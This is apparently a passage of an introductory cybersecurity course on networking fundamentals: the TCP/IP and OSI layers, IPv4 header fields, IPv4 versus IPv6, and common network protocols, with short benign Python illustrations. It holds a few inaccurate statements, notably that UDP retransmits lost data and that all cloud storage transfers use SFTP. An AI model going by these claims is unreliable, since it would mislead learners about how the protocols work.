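
packet = Packet(
    header=Header("192.168.1.10", "192.168.1.20", "aa:bb:cc:00:00:02", 6),
    body=b"Hello, friend!",
    footer=b"\x00",
)

# Bandwidth as defined in the text: quantity of data divided by time in seconds.
def bandwidth(bytes_received, seconds):
    return bytes_received / seconds

print(bandwidth(10_000_000, 2))  # 10 MB received over 2 s -> 5,000,000 bytes/second
```

A security analyst watching network performance would flag sudden, unexplained changes in measurements like this as a possible sign of an attack.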
The TCP/IP model
Hello again. In this video, you'll learn more about communication protocols and devices used to
communicate with each other across the internet. This is called the TCP/IP model. TCP/IP stands
for Transmission Control Protocol and Internet Protocol. TCP/IP is the standard model used for
network communication. Let's take a closer look at this model by defining TCP and IP separately.
First, TCP, or Transmission Control Protocol, is an internet communication protocol that allows two
devices to form a connection and stream data. The protocol includes a set of instructions to organize
data, so it can be sent across a network. It also establishes a connection between two devices and
makes sure that packets reach their appropriate destination. The IP in TCP/IP stands for Internet
Protocol. IP has a set of standards used for routing and addressing data packets as they travel
between devices on a network. Included in the Internet Protocol (IP) is the IP address that functions
as an address for each private network. You'll learn more about IP addresses a bit later. When data
packets are sent and received across a network, they are assigned a port. Within the operating
system
of a network device, a port is a software-based location that organizes the sending and receiving of
data between devices on a network. Ports divide network traffic into segments based on the service
they will perform between two devices. The computers sending and receiving these data segments
know how to prioritize and process these segments based on their port number. This is like sending
a letter to a friend who lives in an apartment building. The mail delivery person not only knows
how to find the building, but they also know exactly
where to go in the building to find the apartment number where your friend lives. Data packets
include instructions that tell the receiving device what to do with the information. These
instructions come in the form of a port number. Port numbers allow computers to split the network
traffic and prioritize the operations they will perform with the data. Some common port
numbers are: port 25, which is used for e-mail, port 443, which is used for secure internet
communication, and port 20, for large file transfers. As you've learned in this video, a lot of
information and instructions are contained in data packets as they travel across a network.
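The common port numbers from the video can be sketched as a simple lookup table. This is only an illustration of the idea: the receiving device uses the port number in a packet to decide which service should process the data.

```python
# The well-known ports mentioned above, mapped to their services.
common_ports = {
    25:  "SMTP (email)",
    443: "HTTPS (secure internet communication)",
    20:  "FTP data (large file transfers)",
}

def service_for(port):
    """Return the service associated with a port number."""
    return common_ports.get(port, "unknown service")

print(service_for(443))   # HTTPS (secure internet communication)
print(service_for(9999))  # unknown service
```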
The four layers of the TCP/IP model
Now that we've discussed the structure of a network and how communication takes place, it's
important for you to know how security professionals identify problems that might arise. The
TCP/IP model is a framework that is used to visualize how data is organized and transmitted across
the network. The TCP/IP model has four layers. The four layers are: the network access layer, the
internet layer, the transport layer, and the application layer. Knowing how the TCP/IP model
organizes network activity allows security professionals to monitor and secure against risks. Let's
examine these layers one at a time. Layer one is the network access layer. The network access layer
deals with creation of data packets and their transmission across a network. This includes
hardware devices connected to physical cables and switches that direct data to its destination.
Layer two is the internet layer. The internet layer is where IP addresses are attached to data packets
to indicate the location of the sender and receiver. The internet layer also focuses on how networks
connect to each other. For example, data packets contain information that determines whether
they will stay on the LAN or be sent to a remote network, like the internet. The transport layer
includes protocols to control the flow of traffic across a network. These protocols permit or deny
communication with other devices and include information about the status of the connection.
Activities of this layer include error control, which ensures data is flowing smoothly across the
network. Finally, at the
application layer, protocols determine how the data packets will interact with receiving devices.
Functions that are organized at the application layer include file transfers and email services. Now you
understand the TCP/IP model and its four layers.
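The four layers just described can be summarized as a small lookup, the kind of mental model a security analyst uses to reason about where in the stack an issue occurred. The descriptions are condensed from the video.

```python
# The four layers of the TCP/IP model and their responsibilities.
tcpip_layers = {
    1: ("network access layer",
        "creation and transmission of data packets; cables and switches"),
    2: ("internet layer",
        "IP addresses attached to packets; how networks connect"),
    3: ("transport layer",
        "traffic flow control and error control"),
    4: ("application layer",
        "how packets interact with receiving devices; file transfers, email"),
}

def describe(layer_number):
    name, role = tcpip_layers[layer_number]
    return f"Layer {layer_number} ({name}): {role}"

print(describe(3))
```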
Learn more about the TCP/IP model
In this reading, you will build on what you have learned about the Transmission Control
Protocol/Internet Protocol (TCP/IP) model, consider the differences between the Open
Systems Interconnection (OSI) model and TCP/IP model, and learn how they’re related.
Then, you’ll review each layer of the TCP/IP model and go over common protocols used in
each layer.
As a security professional, it's important that you understand the TCP/IP model because all
communication on a network is organized using network protocols. Network protocols are
a language that systems use to communicate with each other. In order for two network
systems to successfully communicate with each other, they need to use the same protocol.
The two most common models available are the TCP/IP and the OSI model. These models
are a representative guideline of how network communications work together and move
throughout the network and the host. The examples provided in this course will follow the
TCP/IP model.
The TCP/IP model
The TCP/IP model is a framework used to visualize how data is organized and transmitted
across a network. This model helps network engineers and network security analysts
conceptualize processes on the network and communicate where disruptions or security
threats occur.
The TCP/IP model has four layers: network access layer, internet layer, transport layer, and
application layer. When troubleshooting issues on the network, security professionals can
analyze and deduce which layer or layers an attack occurred based on what processes were
involved in an incident.
Network access layer
The network access layer, sometimes called the data link layer, deals with the creation of
data packets and their transmission across a network. This layer corresponds to the
physical hardware involved in network transmission. Hubs, modems, cables, and wiring are
all considered part of this layer. The address resolution protocol (ARP) is part of the
network access layer. ARP assists IP with directing data packets on the same physical
network by mapping IP addresses to MAC addresses on the same physical network.
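What ARP accomplishes can be sketched as a lookup table that resolves an IP address to a MAC address on the same physical network. The entries here are made up for illustration; a real host builds this table from ARP requests and replies on the local network.

```python
# A simplified model of a host's ARP table: IP address -> MAC address.
arp_table = {
    "192.168.1.10": "aa:bb:cc:00:00:01",
    "192.168.1.20": "aa:bb:cc:00:00:02",
}

def resolve(ip):
    """Resolve an IP address to a MAC address on the local network."""
    mac = arp_table.get(ip)
    if mac is None:
        # A real host would broadcast an ARP request here and cache the reply.
        return "unknown (ARP request needed)"
    return mac

print(resolve("192.168.1.20"))  # aa:bb:cc:00:00:02
print(resolve("10.0.0.1"))      # unknown (ARP request needed)
```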
Internet layer
The internet layer, sometimes referred to as the network layer, is responsible for ensuring
the delivery to the destination host, which potentially resides on a different network. It
ensures IP addresses are attached to data packets to indicate the location of the sender and
receiver. The internet layer also determines which protocol is responsible for delivering
the data packets and ensures the delivery to the destination host. Here are some of the
common protocols that operate at the internet layer:
● Internet Protocol (IP). IP sends the data packets to the correct destination and relies
on the Transmission Control Protocol/User Datagram Protocol (TCP/UDP) to
deliver them to the corresponding service. IP packets allow communication between
two networks. They are routed from the sending network to the receiving network.
TCP/UDP retransmits any data that is lost or corrupt.
● Internet Control Message Protocol (ICMP). The ICMP shares error information and
status updates of data packets. This is useful for detecting and troubleshooting
network errors. The ICMP reports information about packets that were dropped or
that disappeared in transit, issues with network connectivity, and packets
redirected to other routers.
Transport layer
The transport layer is responsible for delivering data between two systems or networks
and includes protocols to control the flow of traffic across a network. TCP and UDP are the
two transport protocols that occur at this layer.
Transmission Control Protocol
The Transmission Control Protocol (TCP) is an internet communication protocol that allows
two devices to form a connection and stream data. It ensures that data is reliably
transmitted to the destination service. TCP contains the port number of the intended
destination service, which resides in the TCP header of a TCP/IP packet.
User Datagram Protocol
The User Datagram Protocol (UDP) is a connectionless protocol that does not establish a
connection between devices before transmissions. It is used by applications that are not
concerned with the reliability of the transmission. Data sent over UDP is not tracked as
extensively as data sent using TCP. Because UDP does not establish network connections, it
is used mostly for performance sensitive applications that operate in real time, such as
video streaming.
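UDP's connectionless style can be demonstrated with a short sketch using Python's socket module, running over the loopback interface only. Note there is no connect/accept handshake as with TCP; the sender simply addresses each datagram and sends it.

```python
import socket

# The "receiver" binds a UDP socket; it never accepts a connection.
receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
receiver.bind(("127.0.0.1", 0))        # port 0: let the OS pick a free port
addr = receiver.getsockname()

# The "sender" transmits datagrams without establishing a connection first.
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sender.sendto(b"frame-1", addr)
sender.sendto(b"frame-2", addr)

# Each recvfrom returns one datagram; UDP itself does not track delivery.
data1, _ = receiver.recvfrom(1024)
data2, _ = receiver.recvfrom(1024)
print(data1, data2)

sender.close()
receiver.close()
```

On a real network, any of these datagrams could be lost without notice, which is exactly the trade-off that makes UDP suitable for real-time applications like video streaming.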
Application layer
The application layer in the TCP/IP model is similar to the application, presentation, and
session layers of the OSI model. The application layer is responsible for making network
requests or responding to requests. This layer defines which internet services and
applications any user can access. Protocols in the application layer determine how the data
packets will interact with receiving devices. Some common protocols used on this layer
are:
● Hypertext Transfer Protocol (HTTP)
● Simple Mail Transfer Protocol (SMTP)
● Secure Shell (SSH)
● File Transfer Protocol (FTP)
● Domain Name System (DNS)
Application layer protocols rely on underlying layers to transfer the data across the
network.
TCP/IP model versus OSI model
The OSI model visually organizes network protocols into different layers. Network professionals
often use this model to communicate with each other about potential sources of problems
or security threats when they occur.
The TCP/IP model combines multiple layers of the OSI model. There are many similarities
between the two models. Both models define standards for networking and divide the
network communication process into different layers. The TCP/IP model is a simplified
version of the OSI model.
Key takeaways
Both the TCP/IP and OSI models are conceptual models that help network professionals
visualize network processes and protocols in regard to data transmission between two or
more systems. The TCP/IP model contains four layers, and the OSI model contains seven
layers.
The OSI model
So far in this section of the course, you learned about the components of a network, network devices,
and how network communication occurs across a network.
All communication on a network is organized using network protocols. Previously, you learned about
the Transmission Control Protocol (TCP), which establishes connections between two devices, and the
Internet Protocol (IP), which is used for routing and addressing data packets as they travel between
devices on a network. This reading will continue to explore the seven layers of the Open Systems
Interconnection (OSI) model and the processes that occur at each layer. We will work backwards from
layer seven to layer one, going from the processes that involve the everyday network user to those that
involve the most basic networking components, like network cables and switches. This reading will also
review the main differences between the TCP/IP and OSI models.
The TCP/IP model vs. the OSI model
The TCP/IP model is a framework used to visualize how data is organized and transmitted across a
network. This model helps network engineers and network security analysts design the data network
and conceptualize processes on the network and communicate where disruptions or security threats
occur.
The TCP/IP model has four layers: network access layer, internet layer, transport layer, and application
layer. When analyzing network events, security professionals can determine what layer or layers an
attack occurred in based on what processes were involved in the incident.
The OSI model is a standardized concept that describes the seven layers computers use to communicate
and send data over the network. Network and security professionals often use this model to
communicate with each other about potential sources of problems or security threats when they occur.
Some organizations rely heavily on the TCP/IP model, while others prefer to use the OSI model. As a
security analyst, it’s important to be familiar with both models. Both the TCP/IP and OSI models are
useful for understanding how networks work.
Layer 7: Application layer
The application layer includes processes that directly involve the everyday user. This layer includes all
of the networking protocols that software applications use to connect a user to the internet. This
characteristic is the identifying feature of the application layer—user connection to the network via
applications and requests.
An example of a type of communication that happens at the application layer is using a web browser.
The internet browser uses HTTP or HTTPS to send and receive information from the website server. The
email application uses simple mail transfer protocol (SMTP) to send and receive email information. Also,
web browsers use the domain name system (DNS) protocol to translate website domain names into IP
addresses which identify the web server that hosts the information for the website.
Layer 6: Presentation layer
Functions at the presentation layer involve data translation and encryption for the network. This layer
adds to and replaces data with formats that can be understood by applications (layer 7) on both sending
and receiving systems. Formats at the user end may be different from those of the receiving system.
Processes at the presentation layer require the use of a standardized format.
Some formatting functions that occur at layer 6 include encryption, compression, and confirmation that
the character code set can be interpreted on the receiving system. One example of encryption that takes
place at this layer is SSL, which encrypts data between web servers and browsers as part of websites
with HTTPS.
Layer 5: Session layer
A session describes when a connection is established between two devices. An open session allows the
devices to communicate with each other. Session layer protocols occur to keep the session open while
data is being transferred and terminate the session once the transmission is complete.
The session layer is also responsible for activities such as authentication, reconnection, and setting
checkpoints during a data transfer. If a session is interrupted, checkpoints ensure that the transmission
picks up at the last session checkpoint when the connection resumes. Sessions include a request and
response between applications. Functions in the session layer respond to requests for service from
processes in the presentation layer (layer 6) and send requests for services to the transport layer (layer
4).
Layer 4: Transport layer
The transport layer is responsible for delivering data between devices. This layer also handles the speed
of data transfer, flow of the transfer, and breaking data down into smaller segments to make them easier
to transport. Segmentation is the process of dividing up a large data transmission into smaller pieces
that can be processed by the receiving system. These segments need to be reassembled at their
destination so they can be processed at the session layer (layer 5). The speed and rate of the
transmission also must match the connection speed of the destination system. TCP and UDP are
transport layer protocols.
Layer 3: Network layer
The network layer oversees receiving frames from the data link layer (layer 2) and delivering them to
the intended destination. The intended destination can be found based on the address that resides in the
frame of the data packets. Data packets allow communication between two networks. These packets
include IP addresses that tell routers where to send them. They are routed from the sending network to
the receiving network.
Layer 2: Data link layer
The data link layer organizes sending and receiving data packets within a single network. The data link
layer is home to switches on the local network and network interface cards on local devices.
Protocols like network control protocol (NCP), high-level data link control (HDLC), and synchronous data
link control protocol (SDLC) are used at the data link layer.
Layer 1: Physical layer
As the name suggests, the physical layer corresponds to the physical hardware involved in network
transmission. Hubs, modems, and the cables and wiring that connect them are all considered part of the
physical layer. To travel across an ethernet or coaxial cable, a data packet needs to be translated into a
stream of 0s and 1s. The stream of 0s and 1s is sent across the physical wiring and cables, received,
and then passed on to higher levels of the OSI model.
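The translation into a stream of 0s and 1s can be sketched in a few lines of Python; the payload here is an arbitrary two-byte example:

```python
# Turn a payload into the bit stream that would travel over the wire, and back.
payload = b"Hi"
bits = "".join(format(byte, "08b") for byte in payload)   # each byte -> 8 bits
print(bits)        # 0100100001101001

# The receiving side regroups the bits into bytes to recover the payload.
restored = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
print(restored)    # b'Hi'
```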
Key takeaways
Both the TCP/IP and OSI models are conceptual models that help network professionals design network
processes and protocols in regard to data transmission between two or more systems. The OSI model
contains seven layers. Network and security professionals use the OSI model to communicate with each
other about potential sources of problems or security threats when they occur. Network engineers and
network security analysts use the TCP/IP and OSI models to conceptualize network processes and
communicate the location of disruptions or threats.
IP addresses and network communication
Let's learn about how IP addresses are used to communicate over a network. IP stands for
internet protocol. An internet protocol address, or IP address, is a unique string of
characters that identifies a location of a device on the internet. Each device on the internet
has a unique IP address, just like every house on a street has its own mailing address. There
are two types of IP addresses: IP version 4, or IPv4, and IP version 6, or IPv6. Let's look at
an example of an IPv4 address. IPv4 addresses are written as four 1-, 2-, or 3-digit numbers
separated by decimal points. In the early days of the internet, IP addresses were all IPv4.
But as the use of the internet grew, all the IPv4 addresses started to get used up, so IPv6
was developed. IPv6 addresses are made up of 32 hexadecimal characters. The longer IPv6 address allows for more devices to be connected to the internet without running out of addresses as quickly as IPv4.
IP addresses can be either public or private. Your internet service provider assigns a public
IP address that is connected to your geographic location. When network communications
go out from your device to the internet, they all have the same public-facing address. Just
like all the roommates in one home share the same mailing address, all the devices on
a network share the same public-facing IP address. Private IP addresses are only seen by
other devices on the same local network. This means that all the devices on your home
network can
communicate with each other using unique IP addresses that the rest of the
internet can't see. Another kind of address used in network communications
is called a MAC address. A MAC address is a unique alphanumeric identifier that is assigned
to each physical device on a network. When a switch receives a data packet, it reads the
MAC address of the destination device and maps it to a port. It then keeps this information
in a MAC address table. Think of the MAC address table like an address book that the switch
uses to direct data packets to the appropriate device.
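The switch behavior described above can be sketched as a small lookup table. This is a toy conceptual model (the class and names are invented for this sketch, not real switch firmware):

```python
# A toy model of a switch's MAC address table: it learns which port a source
# MAC address was seen on, then forwards frames by destination MAC address.
class Switch:
    def __init__(self):
        self.mac_table = {}                       # MAC address -> port number

    def receive(self, src_mac, dst_mac, in_port):
        self.mac_table[src_mac] = in_port         # learn the sender's port
        # Forward to the known port, or flood to all ports if unknown.
        return self.mac_table.get(dst_mac, "flood")

switch = Switch()
switch.receive("aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", in_port=1)  # dst unknown
out = switch.receive("aa:bb:cc:00:00:02", "aa:bb:cc:00:00:01", in_port=2)
print(out)   # 1 -- the switch learned device 1's port from the first frame
```

The first frame is flooded because the destination has never been seen; by the time the reply arrives, the table already maps device 1's MAC address to port 1, just like an entry in the address-book analogy above.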
Components of network layer communication
In the reading about the OSI model, you learned about the seven layers of the OSI model that are used to
conceptualize the way data is transmitted across the internet. In this reading, you will learn more about
operations that take place at layer 3 of the OSI model: the network layer.
Operations at the network layer
Functions at the network layer organize the addressing and delivery of data packets across the network
and internet from the host device to the destination device. This includes directing the packets from one
router to another router across the internet, based on the internet protocol (IP) address of the
destination network. The destination IP address is contained within the header of each data packet. This
address will be stored for future routing purposes in routing tables along the packet’s path to its
destination.
All data packets include an IP address; this is referred to as an IP packet or datagram. A router uses the
IP address to route packets from network to network based on information contained in the IP header of
a data packet. Header information communicates more than just the address of the destination. It also
includes information such as the source IP address, the size of the packet, and which protocol will be
used for the data portion of the packet.
Format of an IPv4 packet
Next, you can review the format of an IP version 4 (IPv4) packet and review a detailed graphic of the
packet header. An IPv4 packet is made up of two sections, the header and the data:
● An IPv4 header format is determined by the IPv4 protocol and includes the IP routing information that devices use to direct the packet. The size of the IPv4 header ranges from 20 to 60 bytes. The first 20 bytes are a fixed set of information containing data such as the source and destination IP address, header length, and total length of the packet. The last set of bytes, which can range from 0 to 40, consists of the options field.
● The length of the data section of an IPv4 packet can vary greatly in size. However, the maximum possible size of an IPv4 packet is 65,535 bytes. It contains the message being transferred over the internet, like website information or email text.
There are 13 fields within the header of an IPv4 packet:
● Version (VER): This 4-bit component tells receiving devices what protocol the packet is using. For an IPv4 packet, this value is 4.
● IP Header Length (HLEN or IHL): HLEN is the packet’s header length. This value indicates where the packet header ends and the data segment begins.
● Type of Service (ToS): Routers prioritize packets for delivery to maintain quality of service on the network. The ToS field provides the router with this information.
● Total Length: This field communicates the total length of the entire IP packet, including the header and data. The maximum size of an IPv4 packet is 65,535 bytes.
● Identification: For IPv4 packets that are larger than the maximum size a network link can carry (the maximum transmission unit, or MTU), the packets are divided, or fragmented, into smaller IP packets. The identification field provides a unique identifier for all the fragments of the original IP packet so that they can be reassembled once they reach their destination.
● Flags: This field provides the routing device with more information about whether the original packet has been fragmented and if there are more fragments in transit.
● Fragmentation Offset: The fragment offset field tells routing devices where in the original packet the fragment belongs.
● Time to Live (TTL): TTL prevents data packets from being forwarded by routers indefinitely. It contains a counter that is set by the source. The counter is decremented by one as the packet passes through each router along its path. When the TTL counter reaches zero, the router currently holding the packet will discard the packet and return an ICMP Time Exceeded error message to the sender.
● Protocol: The protocol field tells the receiving device which protocol will be used for the data portion of the packet.
● Header Checksum: The header checksum field contains a checksum that can be used to detect corruption of the IP header in transit. Corrupted packets are discarded.
● Source IP Address: The source IP address is the IPv4 address of the sending device.
● Destination IP Address: The destination IP address is the IPv4 address of the destination device.
● Options: The options field allows for security options to be applied to the packet if the HLEN value is greater than five. The field communicates these options to the routing devices.
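The fixed 20-byte header layout described above can be built and unpacked with Python's standard struct module. This sketch uses made-up field values (addresses from the documentation ranges, TTL 64, protocol 6 for TCP) purely for illustration, and it also demonstrates the one's-complement header checksum:

```python
import struct

def checksum(header):
    # IPv4 header checksum: one's-complement sum of all 16-bit words.
    total = sum(struct.unpack("!10H", header))
    while total > 0xFFFF:
        total = (total & 0xFFFF) + (total >> 16)   # fold carries back in
    return ~total & 0xFFFF

def build_header(src, dst, ttl=64, proto=6, total_len=40):
    ver_ihl = (4 << 4) | 5                         # Version=4, HLEN=5 (5 words = 20 bytes)
    header = struct.pack(
        "!BBHHHBBH4s4s",
        ver_ihl, 0, total_len,                     # VER/HLEN, ToS, Total Length
        0, 0,                                      # Identification, Flags + Fragment Offset
        ttl, proto, 0,                             # TTL, Protocol, checksum placeholder
        bytes(src), bytes(dst))                    # Source and Destination IP
    # Fill in the checksum field (bytes 10-11) after computing it.
    return header[:10] + struct.pack("!H", checksum(header)) + header[12:]

hdr = build_header(src=[198, 51, 100, 1], dst=[203, 0, 113, 9])
print(hdr[0] >> 4, hdr[0] & 0x0F, hdr[8])   # 4 5 64  (version, HLEN in words, TTL)
print(checksum(hdr))                        # 0 -- a valid header re-checksums to zero
```

Re-running the checksum over a header that already contains its checksum yields zero, which is exactly how a router detects in-transit corruption before deciding whether to discard the packet.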
Difference between IPv4 and IPv6
In an earlier part of this course, you learned about the history of IP addressing. As the internet grew, it
became clear that all of the IPv4 addresses would eventually be depleted; this is called IPv4 address
exhaustion. At the time, no one had anticipated how many computing devices would need an IP address.
IPv6 was developed to mitigate IPv4 address exhaustion and other related concerns.
One of the key differences between IPv4 and IPv6 is the length of the addresses. IPv4 addresses are made of four decimal numbers, each ranging from 0 to 255. Together they span 4 bytes and allow for up to 4.3 billion possible addresses. An example of an IPv4 address would be: 198.51.100.0. IPv6 addresses are made of eight hexadecimal numbers, each consisting of four hexadecimal digits. Together they span 16 bytes and allow for up to 340 undecillion addresses (340 followed by 36 zeros). An example of an IPv6 address would be: 2002:0db8:0000:0000:0000:ff21:0023:1234.
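Python's standard ipaddress module makes the size difference easy to see; this quick sketch reuses the two example addresses above:

```python
import ipaddress

v4 = ipaddress.ip_address("198.51.100.0")
v6 = ipaddress.ip_address("2002:0db8:0000:0000:0000:ff21:0023:1234")

print(len(v4.packed))     # 4 bytes  -> 2**32  (~4.3 billion) possible addresses
print(len(v6.packed))     # 16 bytes -> 2**128 (~340 undecillion) possible addresses
print(v6.compressed)      # 2002:db8::ff21:23:1234 (runs of zero groups collapse to ::)
```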
There are also some differences in the layout of an IPv6 packet header. The IPv6 header format is much simpler than IPv4’s. For example, the IPv4 header includes the IHL, Identification, and Flags fields, whereas the IPv6 header does not. The IPv6 header introduces the Flow Label field, which identifies a packet as requiring special handling by other IPv6 routers.
There are some important security differences between IPv4 and IPv6. IPv6 offers more efficient routing
and eliminates private address collisions that can occur on IPv4 when two devices on the same network
are attempting to use the same address.
Key takeaways
Analyzing the different fields in an IP data packet can be used to find out important security information
about the packet. Some examples of security-related information found in IP address packets are: where
the packet is coming from, where it’s going, and which protocol it’s using. Understanding the data in an
IP data packet will allow you to make critical decisions about the security implications of packets that
you inspect.
Glossary terms from module 1
Terms and definitions from Course 3, Module 1
Bandwidth: The maximum data transmission capacity over a network, measured by bits
per second
Cloud computing: The practice of using remote servers, application, and network services
that are hosted on the internet instead of on local physical devices
Cloud network: A collection of servers or computers that stores resources and data in
remote data centers that can be accessed via the internet
Data packet: A basic unit of information that travels from one device to another within a
network
Hub: A network device that broadcasts information to every device on the network
Internet Protocol (IP): A set of standards used for routing and addressing data packets as
they travel between devices on a network
Internet Protocol (IP) address: A unique string of characters that identifies the location of a
device on the internet
Local Area Network (LAN): A network that spans small areas like an office building, a
school, or a home
Media Access Control (MAC) address: A unique alphanumeric identifier that is assigned to
each physical device on a network
Modem: A device that connects your router to the internet and brings internet access to the
LAN
Network: A group of connected devices
Open systems interconnection (OSI) model: A standardized concept that describes the
seven layers computers use to communicate and send data over the network
Packet sniffing: The practice of capturing and inspecting data packets across a network
Port: A software-based location that organizes the sending and receiving of data between
devices on a network
Router: A network device that connects multiple networks together
Speed: The rate at which a device sends and receives data, measured by bits per second
Switch: A device that makes connections between specific devices on a network by sending
and receiving data between them
TCP/IP model: A framework used to visualize how data is organized and transmitted across
a network
Transmission Control Protocol (TCP): An internet communication protocol that allows two
devices to form a connection and stream data
User Datagram Protocol (UDP): A connectionless protocol that does not establish a
connection between devices before transmissions
Wide Area Network (WAN): A network that spans a large geographic area like a city, state,
or country
Network Protocols
In this section, you'll learn about how networks operate using
tools and protocols. These are the concepts
that you'll use every day in your work as a security analyst. The tools and protocols you'll
learn in this section of the program will help you protect your organization's
network from attacks. Did you know that malicious actors can take advantage of data moving from one
device to another on a network? Thankfully, there are tools and protocols to ensure the network stays
protected against this type of threat. As an example, I once
identified an attack based solely on the fact that they were using the wrong protocol. The network traffic
volumes were right, and it was coming from a trusted IP, but it was on the wrong protocol, which tipped
us off enough to shut down the attack before they caused real damage. First, we'll discuss some common
network protocols. Then we'll discuss virtual private networks, or VPNs. And finally, we'll learn about
firewall security zones and proxy servers.
Networks benefit from having rules. Rules ensure that data sent over the network gets to
the right place. These rules are known as network protocols. Network protocols are a set of rules used
by two or more devices on a network to describe
the order of delivery and the structure of the data. Let's use a scenario
to demonstrate a few different types of network protocols and how they work
together on a network. Say you want to access your favorite recipe website. You go to the address
bar at the top of your browser and type in the website's address. For example:
www.yummyrecipesforme.org. Before you gain access to the website, your device will establish
communications with a web server. That communication uses a protocol called the Transmission Control
Protocol, or TCP. TCP is an internet communications protocol that allows two devices to form a connection
and stream data. TCP also verifies both devices before allowing any further communications to take
place. This is often referred to as a handshake. Once communication is established using a TCP
handshake, a request is made
to the network. Using our example, we have requested data from the Yummy
Recipes For Me server. Their servers will respond to that request and send data packets back to your
device so that you can view the web page. As data packets move across the network, they move between
network devices such as routers. The Address Resolution Protocol, or ARP, is used to determine the MAC
address of the next router or device on the path. This ensures that the data gets to the right place. Now
the communication has been established and the
destination device is known, it's time to access the Yummy Recipes For Me website. The Hypertext
Transfer Protocol Secure, or HTTPS, is a network protocol that provides a secure method of
communication between client and website servers. It allows your web browser to securely send a
request for a webpage to the Yummy Recipes For Me server and receive a webpage
as a response. Next comes a protocol called the Domain Name System, or DNS, which is a network
protocol that translates internet domain names into IP addresses. The DNS protocol sends the domain
name and the web address to a DNS server that retrieves the IP address of the website you were trying
to access, in this case, Yummy Recipes For Me. The IP address is included
as a destination address for the data packets traveling to the Yummy Recipes For Me web server. So just
by visiting one website, the devices on your network are using four different protocols: TCP, ARP,
HTTPS, and DNS. These are just some of the protocols used in network communications. To help you
learn more about the different protocols, we'll discuss them further in an upcoming course material. But
how do these protocols relate to security? Well, on the Yummy Recipes For Me website example, we
used HTTPS, which is a secure protocol that requests a webpage from a web server. HTTPS encrypts
data using the Secure Sockets Layer and Transport Layer Security, otherwise known as SSL/TLS. This
helps keep the information secure from malicious actors who want to steal valuable information. That's a
lot of information and a lot of protocols to remember. Throughout your career as a security analyst,
you'll become more familiar with network protocols and use them in your daily activities.
Common network protocols
In this section of the course, you learned about network protocols and how they organize
communication over a network. This reading will discuss network protocols in more depth and review
some basic protocols that you have learned previously. You will also learn new protocols and discuss
some of the ways protocols are involved in network security.
Overview of network protocols
A network protocol is a set of rules used by two or more devices on a network to describe the order of
delivery and the structure of data. Network protocols serve as instructions that come with the
information in the data packet. These instructions tell the receiving device what to do with the data.
Protocols are like a common language that allows devices all across the world to communicate with and
understand each other.
Even though network protocols perform an essential function in network communication, security
analysts should still understand their associated security implications. Some protocols have
vulnerabilities that malicious actors exploit. For example, a nefarious actor could use the Domain Name
System (DNS) protocol, which resolves web addresses to IP addresses, to divert traffic from a legitimate
website to a malicious website containing malware. You’ll learn more about this topic in upcoming
course materials.
Three categories of network protocols
Network protocols can be divided into three main categories: communication protocols, management
protocols, and security protocols. There are dozens of different network protocols, but you don’t need to
memorize all of them for an entry-level security analyst role. However, it’s important for you to know
the ones listed in this reading.
Communication protocols
Communication protocols govern the exchange of information in network transmission. They dictate
how the data is transmitted between devices and the timing of the communication. They also include
methods to recover data lost in transit. Here are a few of them.
● Transmission Control Protocol (TCP) is an internet communication protocol that allows two devices to form a connection and stream data. TCP uses a three-way handshake process. First, the device sends a synchronize (SYN) request to a server. Then the server responds with a SYN/ACK packet to acknowledge receipt of the device's request. Once the server receives the final ACK packet from the device, a TCP connection is established. In the TCP/IP model, TCP occurs at the transport layer.
● User Datagram Protocol (UDP) is a connectionless protocol that does not establish a connection between devices before a transmission. This makes it less reliable than TCP. But it also means that it works well for transmissions that need to get to their destination quickly. For example, one use of UDP is for internet gaming transmissions. In the TCP/IP model, UDP occurs at the transport layer.
● Hypertext Transfer Protocol (HTTP) is an application layer protocol that provides a method of communication between clients and website servers. HTTP uses port 80. HTTP is considered insecure, so it is being replaced on most websites by a secure version, called HTTPS. However, there are still many websites that use the insecure HTTP protocol. In the TCP/IP model, HTTP occurs at the application layer.
● Domain Name System (DNS) is a protocol that translates internet domain names into IP addresses. When a client computer wishes to access a website domain using their internet browser, a query is sent to a dedicated DNS server. The DNS server then looks up the IP address that corresponds to the website domain. DNS normally uses UDP on port 53. However, if the DNS reply to a request is large, it will switch to using the TCP protocol. In the TCP/IP model, DNS occurs at the application layer.
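The three-way handshake described for TCP can be sketched as a tiny exchange of flag messages. This is a conceptual model only, with invented function names and arbitrary example sequence numbers (real stacks randomize their initial sequence numbers):

```python
# Conceptual model of the TCP three-way handshake: SYN -> SYN/ACK -> ACK.
def handshake(client_isn=1000, server_isn=5000):
    syn = {"flags": "SYN", "seq": client_isn}                          # client -> server
    syn_ack = {"flags": "SYN/ACK", "seq": server_isn,
               "ack": syn["seq"] + 1}                                  # server acknowledges
    ack = {"flags": "ACK", "seq": client_isn + 1,
           "ack": syn_ack["seq"] + 1}                                  # connection established
    return [syn, syn_ack, ack]

for segment in handshake():
    print(segment)
```

Each acknowledgment number is one more than the sequence number it acknowledges, which is how both sides confirm they received the other's synchronize request.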
Management Protocols
The next category of network protocols is management protocols. Management protocols are used for
monitoring and managing activity on a network. They include protocols for error reporting and
optimizing performance on the network.
● Simple Network Management Protocol (SNMP) is a network protocol used for monitoring and managing devices on a network. SNMP can reset a password on a network device or change its baseline configuration. It can also send requests to network devices for a report on how much of the network’s bandwidth is being used up. In the TCP/IP model, SNMP occurs at the application layer.
● Internet Control Message Protocol (ICMP) is an internet protocol used by devices to tell each other about data transmission errors across the network. ICMP is used by a receiving device to send a report to the sending device about the data transmission. ICMP is commonly used as a quick way to troubleshoot network connectivity and latency by issuing the “ping” command on a Linux operating system. In the TCP/IP model, ICMP occurs at the internet layer.
Security Protocols
Security protocols are network protocols that ensure that data is sent and received securely across a
network. Security protocols use encryption algorithms to protect data in transit. Below are some
common security protocols.
● Hypertext Transfer Protocol Secure (HTTPS) is a network protocol that provides a secure method of communication between clients and website servers. HTTPS is a secure version of HTTP that uses secure sockets layer/transport layer security (SSL/TLS) encryption on all transmissions so that malicious actors cannot read the information contained. HTTPS uses port 443. In the TCP/IP model, HTTPS occurs at the application layer.
● Secure File Transfer Protocol (SFTP) is a secure protocol used to transfer files from one device to another over a network. SFTP uses secure shell (SSH), typically through TCP port 22. SSH uses Advanced Encryption Standard (AES) and other types of encryption to ensure that unintended recipients cannot intercept the transmissions. In the TCP/IP model, SFTP occurs at the application layer. SFTP is often used with cloud storage. Every time a user uploads or downloads a file from cloud storage, the file is transferred using the SFTP protocol.
